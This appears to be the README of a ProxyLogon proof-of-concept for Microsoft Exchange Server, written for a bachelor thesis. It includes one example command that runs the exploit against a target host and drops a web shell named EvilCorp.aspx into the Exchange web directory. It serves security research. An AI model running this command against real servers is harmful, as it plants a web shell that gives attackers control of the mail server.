Note: This project is only for educational and security testing purposes. Do not use this POC for malicious or unauthorized activities.
This project demonstrates a proof-of-concept (POC) for the ProxyLogon vulnerability in Microsoft Exchange Server. ProxyLogon is a critical security flaw identified in early 2021 and affects specific versions of Microsoft Exchange Server. This POC is intended for security researchers and system administrators to understand and mitigate the vulnerability.
This project is a part of my bachelor thesis at FIT CTU University. The thesis focuses on Proxylogon attacks, and this POC is integral to the research. The thesis, written in the Czech language, can be found here.
Example usage:
python3 main.py -t https://10.0.0.10 \
-e [email protected] \
-l "C:\\Program Files\\Microsoft\\Exchange
Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\EvilCorp.aspx" \
-x http://127.0.0.1:8080 \
-r "/ecp/auth/EvilCorp.aspx" \
-s EvilCorp
